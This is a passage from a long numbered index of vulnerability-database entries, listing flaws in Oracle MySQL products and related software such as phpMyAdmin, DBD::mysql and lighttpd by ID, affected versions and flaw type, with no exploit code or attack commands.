19704| [104089] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 DDL unknown vulnerability
19705| [104088] Oracle MySQL Server up to 5.7.18 C API information disclosure
19706| [104087] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 DDL unknown vulnerability
19707| [104086] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 Client mysqldump unknown vulnerability
19708| [104085] Oracle MySQL Server up to 5.6.36/5.7.18 Replication denial of service
19709| [104084] Oracle MySQL Server up to 5.6.36/5.7.18 Replication denial of service
19710| [104083] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 Charsets denial of service
19711| [104082] Oracle MySQL Cluster up to 7.3.5 CLSTCONF memory corruption
19712| [104081] Oracle MySQL Server up to 5.7.16 X Plugin denial of service
19713| [104080] Oracle MySQL Server up to 5.7.18 Optimizer denial of service
19714| [104079] Oracle MySQL Server up to 5.7.18 Optimizer denial of service
19715| [104078] Oracle MySQL Server up to 5.7.18 Optimizer denial of service
19716| [104077] Oracle MySQL Server up to 5.7.18 DML denial of service
19717| [104076] Oracle MySQL Server up to 5.7.18 DML denial of service
19718| [104075] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 DML denial of service
19719| [104074] Oracle MySQL Server up to 5.7.18 DML denial of service
19720| [104073] Oracle MySQL Server up to 5.7.18 DML denial of service
19721| [104072] Oracle MySQL Server up to 5.7.18 X Plugin denial of service
19722| [104071] Oracle MySQL Server up to 5.7.18 UDF denial of service
19723| [104069] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 C API denial of service
19724| [104068] Oracle MySQL Connectors up to 6.1.10 Connector/C denial of service
19725| [104067] Oracle MySQL Server up to 5.6.35/5.7.17 OpenSSL unknown vulnerability
19726| [104066] Oracle MySQL Connectors up to 5.3.7 OpenSSL unknown vulnerability
19727| [104065] Oracle MySQL Connectors up to 6.1.9 OpenSSL unknown vulnerability
19728| [104064] Oracle MySQL Server up to 5.6.36/5.7.18 DML denial of service
19729| [104063] Oracle MySQL Server up to 5.6.36/5.7.18 Memcached denial of service
19730| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
19731| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
19732| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
19733| [103583] phpMyAdmin 4.0/4.4/4.6 MySQL Database Connection privilege escalation
19734| [103578] MySQL Dumper 1.24 Stored cross site scripting
19735| [102980] DBD::mysql Module up to 4.043 on Perl SSL weak encryption
19736| [102979] DBD::mysql Module up to 4.043 on Perl Error Use-After-Free memory corruption
19737| [102618] KBVault Mysql Free Knowledge Base 0.16a File Upload Explorer.aspx privilege escalation
19738| [100915] Accellion FTA communication_p2p.php mysql_real_escape_string sql injection
19739| [100543] Oracle MySQL up to 5.1.40 Connector/J privilege escalation
19740| [100232] Oracle MySQL Server up to 5.7.17 Encryption weak encryption
19741| [100231] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Monitoring denial of service
19742| [100228] Oracle MySQL Workbench up to 6.3.8 Encryption information disclosure
19743| [100227] Oracle MySQL Server up to 5.7.17 C API information disclosure
19744| [100226] Oracle MySQL Server up to 5.7.17 Privileges unknown vulnerability
19745| [100225] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 DDL unknown vulnerability
19746| [100224] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Privileges denial of service
19747| [100223] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Privileges denial of service
19748| [100222] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Privileges denial of service
19749| [100221] Oracle MySQL Server up to 5.7.17 Optimizer denial of service
19750| [100220] Oracle MySQL Server up to 5.7.17 DML denial of service
19751| [100219] Oracle MySQL Server up to 5.7.17 DML denial of service
19752| [100218] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 DML denial of service
19753| [100217] Oracle MySQL Server up to 5.7.17 Audit Plug-in denial of service
19754| [100215] Oracle MySQL Server up to 5.5.54/5.6.35 C API information disclosure
19755| [100214] Oracle MySQL Server up to 5.7.17 Privileges unknown vulnerability
19756| [100213] Oracle MySQL Cluster up to 7.2.27/7.3.16/7.4.14/7.5.5 DD denial of service
19757| [100212] Oracle MySQL Server up to 5.7.17 InnoDB denial of service
19758| [100211] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 OpenSSL information disclosure
19759| [100210] Oracle MySQL Enterprise Backup up to 3.12.3/4.0.3 ENTRBACK information disclosure
19760| [100209] Oracle MySQL Connectors up to 5.1.41 Connector/J unknown vulnerability
19761| [100208] Oracle MySQL Server up to 5.6.35 Optimizer denial of service
19762| [100207] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Optimizer denial of service
19763| [100206] Oracle MySQL Server up to 5.7.17 DML denial of service
19764| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
19765| [100204] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Client mysqldump unknown vulnerability
19766| [100203] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Thread Pooling denial of service
19767| [100202] Oracle MySQL Server up to 5.6.35/5.7.17 Pluggable Auth Integer denial of service
19768| [100201] Oracle MySQL Server up to 5.6.35/5.7.17 Memcached denial of service
19769| [100200] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Optimizer denial of service
19770| [100199] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 DML denial of service
19771| [100198] Oracle MySQL Workbench up to 6.3.7 OpenSSL memory corruption
19772| [100197] Oracle MySQL Enterprise Backup up to 3.12.2/4.0.1 ENTRBACK memory corruption
19773| [100196] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Monitoring: Server denial of service
19774| [100195] Oracle MySQL Workbench up to 6.3.8 OpenSSL denial of service
19775| [100194] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Struts 2 privilege escalation
19776| [99815] ATutor 2.2.1 mysql_connect.inc.php searchFriends sql injection
19777| [97041] MySQL DBD::mysql up to 4.38 denial of service
19778| [96814] MariaDB up to 5.5.54/10.0.29/10.1.21/10.2.3 libmysqlclient.so denial of service
19779| [96808] Oracle MySQL up to 5.6.21/5.7.4 libmysqlclient.so denial of service
19780| [95832] Zabbix up to 2.0.17/2.2.12/3.0.2 Configuration Script userparameter_mysql.conf) privilege escalation
19781| [95730] Oracle MySQL Server up to 5.7.16 Encryption weak encryption
19782| [95729] Oracle MySQL Server up to 5.7.16 X Plugin unknown vulnerability
19783| [95728] Oracle MySQL Cluster 7.2.25/7.3.14/7.4.12 Cluster NDBAPI denial of service
19784| [95727] Oracle MySQL Cluster 7.2.25/7.3.14/7.4.12 denial of service
19785| [95726] Oracle MySQL Cluster 7.2.19/7.3.8/7.4.5 denial of service
19786| [95723] Oracle MySQL Server 5.6.34/5.7.16 Replication denial of service
19787| [95722] Oracle MySQL Server up to 5.5.53 Charsets denial of service
19788| [95720] Oracle MySQL Cluster 7.2.26/7.3.14/7.4.12 NDBAPI denial of service
19789| [95719] Oracle MySQL Server up to 5.7.16 Optimizer denial of service
19790| [95716] Oracle MySQL Server up to 5.7.16 Replication denial of service
19791| [95715] Oracle MySQL Server 5.5.53/5.6.34/5.7.16 Optimizer denial of service
19792| [95714] Oracle MySQL Server 5.6.34 5.7.16 InnoDB denial of service
19793| [95713] Oracle MySQL Server 5.5.53/5.6.34/5.7.16 DML denial of service
19794| [95712] Oracle MySQL Server 5.6.34/5.7.16 DDL denial of service
19795| [95711] Oracle MySQL Server 5.5.53/5.6.34/5.7.16 DDL denial of service
19796| [95709] Oracle MySQL Server 5.6.34/5.7.16 Encryption denial of service
19797| [95708] Oracle MySQL Enterprise Monitor 3.1.3.7856 Monitoring Agent memory corruption
19798| [95707] Oracle MySQL Enterprise Monitor 3.1.4.7895/3.2.4.1102/3.3.0.1098 Monitoring denial of service
19799| [95706] Oracle MySQL Enterprise Monitor 3.1.4.7895/3.2.1.1049 Monitoring memory corruption
19800| [95705] Oracle MySQL Enterprise Monitor 3.1.5.7958/3.2.1.1049, Monitoring privilege escalation
19801| [95704] Oracle MySQL Enterprise Monitor 3.1.4.7895/3.2.1.1049 Monitoring unknown vulnerability
19802| [93866] DBD-mysql up to 3.x/4.040 on Perl Use-After-Free memory corruption
19803| [92923] Oracle MySQL Server up to 5.6.33/5.7.15 Encryption denial of service
19804| [92911] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL weak encryption
19805| [92900] Oracle MySQL Server up to 5.5.51/5.6.32/5.7.14 Optimizer denial of service
19806| [92899] Oracle MySQL Server up to 5.6.31/5.7.13 InnoDB denial of service
19807| [92898] Oracle MySQL Server up to 5.5.51/5.6.32/5.7.14 GIS denial of service
19808| [92897] Oracle MySQL Server up to 5.5.51 DML denial of service
19809| [92896] Oracle MySQL Server up to 5.5.50/5.6.31/5.7.13 DML denial of service
19810| [92895] Oracle MySQL Server up to 5.6.31 5.7.13 DML denial of service
19811| [92874] Oracle MySQL Connector up to 2.1.3/2.0.4 Connector/Python unknown vulnerability
19812| [92850] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
19813| [92835] Oracle MySQL Server up to 5.7.13 Audit denial of service
19814| [92834] Oracle MySQL Server up to 5.7.13 RBR denial of service
19815| [92833] Oracle MySQL Server up to 5.7.13 Performance Schema denial of service
19816| [92832] Oracle MySQL Server up to 5.7.14 Optimizer denial of service
19817| [92831] Oracle MySQL Server up to 5.7.13 Memcached denial of service
19818| [92830] Oracle MySQL Server up to 5.6.32/5.7.14 InnoDB denial of service
19819| [92829] Oracle MySQL Server up to 5.6.31 5.7.13 InnoDB denial of service
19820| [92828] Oracle MySQL Server up to 5.7.13 InnoDB denial of service
19821| [92827] Oracle MySQL Server up to 5.5.51/5.6.32/5.7.14 Federated denial of service
19822| [92826] Oracle MySQL Server up to 5.7.13 DML denial of service
19823| [92821] Oracle MySQL Server up to 5.7.13 Replication denial of service
19824| [92820] Oracle MySQL Server up to 5.7.13 Performance Schema denial of service
19825| [92819] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
19826| [92818] Oracle MySQL Server up to 5.5.52/5.6.33/5.7.15 Encryption information disclosure
19827| [92817] Oracle MySQL Server up to 5.5.51/5.6.32/5.7.14 Types denial of service
19828| [92815] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
19829| [92814] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
19830| [92813] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
19831| [92798] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
19832| [92797] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
19833| [92790] Oracle MySQL Server up to 5.7.14 Privileges information disclosure
19834| [92789] Oracle MySQL Server up to 5.6.30/5.7.12 InnoDB Plugin unknown vulnerability
19835| [92292] libdbd-mysql-perl 4.028 Error Message denial of service
19836| [91920] Open Dental up to 16.1 MySQL Server Default Credentials weak authentication
19837| [91625] PHP up to 5.6.25/7.0.10 mysqlnd Heap-based memory corruption
19838| [91505] Oracle MySQL up to 5.5.52/5.6.33/5.7.15 Logging my.cnf privilege escalation
19839| [90877] DBD::mysql up to 4.033 my_login memory corruption
19840| [90876] DBD::mysql up to 4.028 Use-After-Free memory corruption
19841| [90137] Oracle MySQL Server up to 5.5.48/5.6.29/5.7.10 Encryption information disclosure
19842| [90136] Oracle MySQL Server up to 5.5.48/5.6.29/5.7.11 Connection information disclosure
19843| [90134] Oracle MySQL Server up to 5.7.12 Encryption denial of service
19844| [90133] Oracle MySQL Server up to 5.7.12 Replication denial of service
19845| [90132] Oracle MySQL Server up to 5.5.49/5.6.30/5.7.12 RBR denial of service
19846| [90131] Oracle MySQL Server up to 5.6.30/5.7.12 Privileges denial of service
19847| [90130] Oracle MySQL Server up to 5.7.12 Optimizer denial of service
19848| [90129] Oracle MySQL Server up to 5.7.12 Log denial of service
19849| [90128] Oracle MySQL Server up to 5.6.30/5.7.12 InnoDB denial of service
19850| [90127] Oracle MySQL Server up to 5.7.12 InnoDB denial of service
19851| [90126] Oracle MySQL Server up to 5.6.30/5.7.12 Encryption denial of service
19852| [90125] Oracle MySQL Server up to 5.5.49/5.6.30/5.7.12 DML denial of service
19853| [90124] Oracle MySQL Server up to 5.7.12 InnoDB memory corruption
19854| [90123] Oracle MySQL Server up to 5.5.49/5.6.30/5.7.12 Types denial of service
19855| [90122] Oracle MySQL Server up to 5.7.12 Optimizer denial of service
19856| [90121] Oracle MySQL Server up to 5.6.30/5.7.12 Optimizer denial of service
19857| [90120] Oracle MySQL Server up to 5.6.30/5.7.12 FTS denial of service
19858| [90118] Oracle MySQL Server up to 5.6.30/5.7.12 Encryption denial of service
19859| [90117] Oracle MySQL Server up to 5.7.11 Optimizer denial of service
19860| [87408] PHP up to 5.4.42/5.5.26/5.6.10 SSL ext/mysqlnd/mysqlnd.c weak encryption
19861| [82687] Oracle MySQL Server up to 5.5.48/5.6.29/5.7.11 Connection Handling spoofing
19862| [82685] Oracle MySQL Enterprise Monitor up to 3.0.25/3.1.2 Monitoring unknown vulnerability
19863| [82684] Oracle MySQL Server up to 5.6.28/5.7.10 Encryption denial of service
19864| [82683] Oracle MySQL Server up to 5.6.29/5.7.11 Pluggable Authentication unknown vulnerability
19865| [82682] Oracle MySQL Server up to 5.6.29/5.7.11 Packaging memory corruption
19866| [80605] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 Privileges denial of service
19867| [80604] Oracle MySQL Server up to 5.6.26 denial of service
19868| [80603] Oracle MySQL Server up to 5.5.45/5.6.26 Encryption information disclosure
19869| [80602] Oracle MySQL Server up to 5.6.27/5.7.9 Replication denial of service
19870| [80601] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 UDF denial of service
19871| [80600] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 Encryption weak encryption
19872| [80599] Oracle MySQL Server 5.7.9 Partition denial of service
19873| [80598] Oracle MySQL Server 5.7.9 Optimizer denial of service
19874| [80597] Oracle MySQL Server up to 5.6.27 InnoDB denial of service
19875| [80596] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 InnoDB denial of service
19876| [80595] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 DML denial of service
19877| [80594] Oracle MySQL Server up to 5.5.46 Optimizer denial of service
19878| [80593] Oracle MySQL Server up to 5.6.27/5.7.9 Optimizer denial of service
19879| [80592] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 Optimizer denial of service
19880| [80591] Oracle MySQL Server up to 5.5.31/5.6.11 Optimizer denial of service
19881| [80590] Oracle MySQL Server up to 5.5.46/5.6.27 DML denial of service
19882| [80589] Oracle MySQL Server up to 5.6.27/5.7.9 DML denial of service
19883| [80588] Oracle MySQL Server up to 5.6.27 DML denial of service
19884| [80587] Oracle MySQL Server up to 5.6.21 DML denial of service
19885| [80586] Oracle MySQL Server up to 5.5.46/5.6.27/5.7.9 Options unknown vulnerability
19886| [80585] Oracle MySQL Server up to 5.6.27/5.7.9 DML memory corruption
19887| [80184] Rename Plugin 1.0 on WordPress mysqldump_download.php directory traversal
19888| [78705] Oracle MySQL Server up to 5.5.45/5.6.26 Partition denial of service
19889| [78703] Oracle MySQL Server up to 5.6.26 Memcached denial of service
19890| [78702] Oracle MySQL Server up to 5.5.45/5.6.26 SP denial of service
19891| [78701] Oracle MySQL Server up to 5.5.43/5.6.24 Privileges information disclosure
19892| [78700] Oracle MySQL Server up to 5.6.26 Privileges denial of service
19893| [78699] Oracle MySQL Server up to 5.6.26 Replication denial of service
19894| [78698] Oracle MySQL Server up to 5.5.45/5.6.26 Query Cache denial of service
19895| [78697] Oracle MySQL Server up to 5.5.45/5.6.26 InnoDB denial of service
19896| [78696] Oracle MySQL Server up to 5.6.25 InnoDB denial of service
19897| [78695] Oracle MySQL Server up to 5.5.45/5.6.26 DML denial of service
19898| [78694] Oracle MySQL Server up to 5.6.25 libmysqld denial of service
19899| [78693] Oracle MySQL Server up to 5.5.45/5.6.26 Types unknown vulnerability
19900| [78692] Oracle MySQL Server up to 5.6.20 Types denial of service
19901| [78691] Oracle MySQL Server up to 5.5.45/5.6.26 Privileges unknown vulnerability
19902| [78690] Oracle MySQL Server up to 5.6.25 Partition denial of service
19903| [78689] Oracle MySQL Server up to 5.5.45/5.6.26 Partition denial of service
19904| [78688] Oracle MySQL Server up to 5.5.45/5.6.26 Parser denial of service
19905| [78687] Oracle MySQL Server up to 5.6.26 Optimizer denial of service
19906| [78686] Oracle MySQL Server up to 5.5.44 InnoDB denial of service
19907| [78685] Oracle MySQL Server up to 5.6.23 InnoDB denial of service
19908| [78684] Oracle MySQL Server up to 5.6.26 DML denial of service
19909| [78683] Oracle MySQL Server up to 5.5.45/5.6.26 DML denial of service
19910| [78682] Oracle MySQL Server up to 5.6.23 DML denial of service
19911| [78681] Oracle MySQL Server up to 5.5.45/5.6.26 DDL denial of service
19912| [78680] Oracle MySQL Server up to 5.5.44/5.6.25 DML unknown vulnerability
19913| [78679] Oracle MySQL Enterprise Monitor up to 2.3.20/3.0.20 C-Agent / Service Manager denial of service
19914| [78678] Oracle MySQL Server up to 5.6.25 Encryption spoofing
19915| [78676] Oracle MySQL Enterprise Monitor up to 2.3.20/3.0.22 C-Agent denial of service
19916| [77699] JSP/MySQL Administrador Web 1 sys/sys/listaBD2.jsp cross site scripting
19917| [77698] JSP/MySQL Administrador Web 1 sys/sys/listaBD2.jsp cross site request forgery
19918| [76704] Oracle MySQL Server up to 5.6.24 Partition denial of service
19919| [76703] Oracle MySQL Server up to 5.6.24 RBR denial of service
19920| [76701] Oracle MySQL Server up to 5.6.24 Firewall denial of service
19921| [76699] Oracle MySQL Server up to 5.6.24 Firewall denial of service
19922| [76695] Oracle MySQL Server up to 5.6.24 MemCached denial of service
19923| [76691] Oracle MySQL Server up to 5.5.42 Optimizer denial of service
19924| [76690] Oracle MySQL Server up to 5.6.22 InnoDB denial of service
19925| [76686] Oracle MySQL Server up to 5.5.43/5.6.24 denial of service
19926| [76671] Oracle MySQL Server up to 5.5.43/5.6.23 Pluggable Auth information disclosure
19927| [76634] Oracle MySQL Server up to 5.5.43/5.6.24 DML denial of service
19928| [76629] Oracle MySQL Server up to 5.5.43/5.6.24 Optimizer denial of service
19929| [76628] Oracle MySQL Server up to 5.6.24 denial of service
19930| [76626] Oracle MySQL Server up to 5.6.24 Firewall information disclosure
19931| [76608] Oracle MySQL Server up to 5.5.43/5.6.23 information disclosure
19932| [76605] Oracle MySQL Server up to 5.6.24 Partition information disclosure
19933| [76599] Oracle MySQL Server up to 5.6.24 DML information disclosure
19934| [76571] Oracle MySQL Server up to 5.5.43/5.6.24 GIS denial of service
19935| [76081] MySQL Lite Administrator Beta-1 tabella.php cross site scripting
19936| [75579] lighttpd 1.4.35 Log File mod_mysql_vhost.c privilege escalation
19937| [75159] Oracle MySQL up to 5.7.2 SSL Client weak encryption
19938| [74969] Oracle MySQL Server up to 5.6.23 Replication denial of service
19939| [74967] Oracle MySQL Server up to 5.6.23 SP denial of service
19940| [74966] Oracle MySQL Server up to 5.6.22 DML weak encryption
19941| [74965] Oracle MySQL Server up to 5.6.23 Privileges denial of service
19942| [74964] Oracle MySQL Server up to 5.6.23 Memcached denial of service
19943| [74963] Oracle MySQL Server up to 5.6.23 InnoDB denial of service
19944| [74962] Oracle MySQL Server up to 5.5.42/5.6.23 Federated unknown vulnerability
19945| [74961] Oracle MySQL Server up to 5.5.42/5.6.23 DDL unknown vulnerability
19946| [74960] Oracle MySQL Server up to 5.6.22 XA weak encryption
19947| [74959] Oracle MySQL Server up to 5.5.41/5.6.22 Encryption weak encryption
19948| [74958] Oracle MySQL Server up to 5.6.23 Partition denial of service
19949| [74957] Oracle MySQL Server up to 5.6.22 Partition weak encryption
19950| [74956] Oracle MySQL Server up to 5.5.42/5.6.23 Optimizer unknown vulnerability
19951| [74955] Oracle MySQL Server up to 5.6.22 Optimizer weak encryption
19952| [74954] Oracle MySQL Server up to 5.5.41/5.6.22 DML unknown vulnerability
19953| [74953] Oracle MySQL Server up to 5.6.23 InnoDB denial of service
19954| [74952] Oracle MySQL Server up to 5.6.22 InnoDB weak encryption
19955| [74951] Oracle MySQL Server up to 5.6.23 Information Schema denial of service
19956| [74950] Oracle MySQL Server up to 5.5.41/5.6.22 DDL unknown vulnerability
19957| [74949] Oracle MySQL Connectors up to 5.1.34 Connector/J unknown vulnerability
19958| [74948] Oracle MySQL Server up to 5.5.41/5.6.22 Privileges unknown vulnerability
19959| [74947] Oracle MySQL Server up to 5.6.22 Encryption s23_srvr.c ssl23_get_client_hello denial of service
19960| [74946] Oracle MySQL Server up to 5.5.42/5.6.23 Compiling unknown vulnerability
19961| [74945] Oracle MySQL Enterprise Monitor up to 2.3.19/3.0.18 Service Manager s:token/ cross site request forgery
19962| [74944] Oracle MySQL Enterprise Monitor up to 2.3.16/3.0.10 Service Manager memory corruption
19963| [68810] Oracle MySQL Server up to 5.5.40/5.6.21 Foreign Key information disclosure
19964| [68809] Oracle MySQL Server up to 5.6.21 Pluggable Auth denial of service
19965| [68808] Oracle MySQL Server up to 5.5.40/5.6.21 DML denial of service
19966| [68807] Oracle MySQL Server up to 5.6.21 Optimizer denial of service
19967| [68806] Oracle MySQL Server up to 5.5.40 Foreign Key denial of service
19968| [68805] Oracle MySQL Server up to 5.5.38/5.6.19 DDL denial of service
19969| [68804] Oracle MySQL Server up to 5.5.40/5.6.21 Replication denial of service
19970| [68803] Oracle MySQL Server up to 5.5.40/5.6.21 Replication denial of service
19971| [68802] Oracle MySQL Server up to 5.5.40/5.6.21 Encryption weak encryption
19972| [67988] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
19973| [67987] Oracle MySQL Server up to 5.6.19 denial of service
19974| [67986] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
19975| [67985] Oracle MySQL Server up to 5.6.19 denial of service
19976| [67984] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
19977| [67983] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
19978| [67982] Oracle MySQL Server up to 5.5.38 denial of service
19979| [67981] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
19980| [67979] Oracle MySQL Server up to 5.5.38/5.6.19 unknown vulnerability
19981| [67978] Oracle MySQL Server up to 5.5.38/5.6.19 denial of service
19982| [67977] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
19983| [67976] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
19984| [67975] Oracle MySQL Server up to 5.5.39/5.6.20 information disclosure
19985| [67974] Oracle MySQL Server up to 5.5.38/5.6.19 Messages Stack-Based sql injection
19986| [67973] Oracle MySQL Server up to 5.6.19 unknown vulnerability
19987| [67972] Oracle MySQL Server up to 5.5.39/5.6.20 unknown vulnerability
19988| [67971] Oracle MySQL Server up to 5.5.38/5.6.19 unknown vulnerability
19989| [67970] Oracle MySQL Server up to 5.6.19 Messages NULL Pointer Dereference denial of service
19990| [67969] Oracle MySQL Server up to 5.5.39/5.6.20 directory traversal
19991| [67968] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
19992| [67967] Oracle MySQL Server up to 5.5.39/5.6.20 denial of service
19993| [67966] Oracle MySQL Server up to 5.5.39/5.6.20 unknown vulnerability
19994| [68555] McAfee Network Data Loss Prevention 9.2.0 MySQL Database weak authentication
19995| [67245] phpMyAdmin up to 4.2.5 MySQL User List server_user_groups.php privilege escalation
19996| [67166] Oracle MySQL Server up to 5.5.35/5.6.15 denial of service
19997| [67165] Oracle MySQL Server up to 5.6.17 denial of service
19998| [67163] Oracle MySQL Server up to 5.6.17 denial of service
19999| [67162] Oracle MySQL Server up to 5.5.37 denial of service
20000| [67161] Oracle MySQL Server up to 5.6.17 denial of service
20001| [67160] Oracle MySQL Server up to 5.5.37 denial of service
20002| [67159] Oracle MySQL Server up to 5.5.37/5.6.17 unknown vulnerability
20003| [67158] Oracle MySQL Server up to 5.5.37/5.6.17 unknown vulnerability
20004| [67157] Oracle MySQL Server up to 5.6.17 unknown vulnerability
20005| [13065] Django up to 1.7 MySQL Typecast privilege escalation
20006| [12983] Oracle MySQL Server up to 5.5.36/5.6.16 Options denial of service
20007| [12982] Oracle MySQL Server up to 5.5.35/5.6.15 Federated denial of service
20008| [12981] Oracle MySQL Server up to 5.5.35/5.6.15 Replication denial of service
20009| [12980] Oracle MySQL Server up to 5.6.15 Privileges denial of service
20010| [12979] Oracle MySQL Server up to 5.5.36/5.6.16 Performance Schema denial of service
20011| [12978] Oracle MySQL Server up to 5.5.35/5.6.15 XML denial of service
20012| [12977] Oracle MySQL Server up to 5.5.35/5.6.15 Partition denial of service
20013| [12976] Oracle MySQL Server up to 5.6.15 Optimizer denial of service
20014| [12975] Oracle MySQL Server up to 5.6.15 MyISAM denial of service
20015| [12974] Oracle MySQL Server up to 5.6.16 InnoDB denial of service
20016| [12973] Oracle MySQL Server up to 5.6.15 DML denial of service
20017| [12972] Oracle MySQL Client up to 5.5.36/5.6.16 unknown vulnerability
20018| [12971] Oracle MySQL Server up to 5.5.36/5.6.16 RBR unknown vulnerability
20019| [12970] Oracle MySQL Server up to 5.6.15 InnoDB unknown vulnerability
20020| [12613] lighttpd up to 1.4.34 MySQL Virtual Hosting Module mod_mysql_vhost.c sql injection
20021| [12135] Oracle MySQL client/mysql.cc Server Version memory corruption
20022| [66191] Cisco Video Surveillance Operations Manager MySQL Database denial of service
20023| [66079] CSP MySQL User Manager 2.3 Login Page sql injection
20024| [11948] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Error Handling Crash denial of service
20025| [11947] Oracle MySQL Server up to 5.5.34/5.6.14 Replication denial of service
20026| [11946] Oracle MySQL Server up to 5.6.13 Performance Schema Stored denial of service
20027| [11945] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 InnoDB memory corruption
20028| [11944] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Optimizer Crash denial of service
20029| [11943] Oracle MySQL Server up to 5.6.14 InnoDB Stored denial of service
20030| [11942] Oracle MySQL Server up to 5.6.13 FTS Stored denial of service
20031| [11941] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Privileges Crash denial of service
20032| [11940] Oracle MySQL Server up to 5.5.33/5.6.13 Partition denial of service
20033| [11939] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 Optimizer Crash denial of service
20034| [11938] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 Locking Crash denial of service
20035| [11937] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 InnoDB Crash denial of service
20036| [11936] Oracle MySQL Server up to 5.6.14 InnoDB Stored denial of service
20037| [11935] Oracle MySQL Server up to 5.6.13 InnoDB Stored denial of service
20038| [11934] Oracle MySQL Server up to 5.6.13 Thread Pooling Stored denial of service
20039| [11933] Oracle MySQL Server up to 5.6.13 Stored Procedure denial of service
20040| [11932] Oracle MySQL Server up to 5.6.14 GIS Stored denial of service
20041| [11931] Oracle MySQL Enterprise Monitor up to 2.3.14/3.0.4 Service Manager unknown vulnerability
20042| [10822] Oracle MySQL Server up to 5.6.12 Locking unknown vulnerability
20043| [10821] Oracle MySQL Server up to 5.6.12 InnoDB unknown vulnerability
20044| [10820] Oracle MySQL Server up to 5.6.12 Optimizer unknown vulnerability
20045| [10819] Oracle MySQL Server up to 5.1.70/5.5.32/5.6.12 Optimizer memory corruption
20046| [10818] Oracle MySQL Server up to 5.1/5.5.22 Optimizer denial of service
20047| [10817] Oracle MySQL Server up to 5.6.12 InnoDB unknown vulnerability
20048| [10816] Oracle MySQL Server up to 5.5.32/5.6.12 Replication unknown vulnerability
20049| [10815] Oracle MySQL Enterprise Monitor up to 2.3.13 Service Manager privilege escalation
20050| [65143] MariaDB up to 5.5.28 MySQL privilege escalation
20051| [9672] Oracle MySQL Server up to 5.6.11 XA Transactions denial of service
20052| [9671] Oracle MySQL Server up to 5.5.31/5.6.11 Server Replication denial of service
20053| [9670] Oracle MySQL Server up to 5.6.11 InnoDB denial of service
20054| [9669] Oracle MySQL Server up to 5.6.11 Server Privileges unknown vulnerability
20055| [9668] Oracle MySQL Server up to 5.5.30/5.6.10 Server Partition Stored unknown vulnerability
20056| [9667] Oracle MySQL Server up to 5.5.31 Server Parser denial of service
20057| [9666] Oracle MySQL Server up to 5.5.30/5.6.10 Server Options Stored unknown vulnerability
20058| [9665] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Options denial of service
20059| [9664] Oracle MySQL Server up to 5.6.11 Server Optimizer unknown vulnerability
20060| [9663] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 Server Optimizer denial of service
20061| [9662] Oracle MySQL Server up to 5.5.30/5.6.10 Prepared Statement Stored unknown vulnerability
20062| [9661] Oracle MySQL Server up to 5.6.11 InnoDB denial of service
20063| [9660] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 Full Text Search denial of service
20064| [9659] Oracle MySQL Server up to 5.6.11 Data Manipulation Language unknown vulnerability
20065| [9658] Oracle MySQL Server up to 5.5.31/5.6.11 Data Manipulation Language denial of service
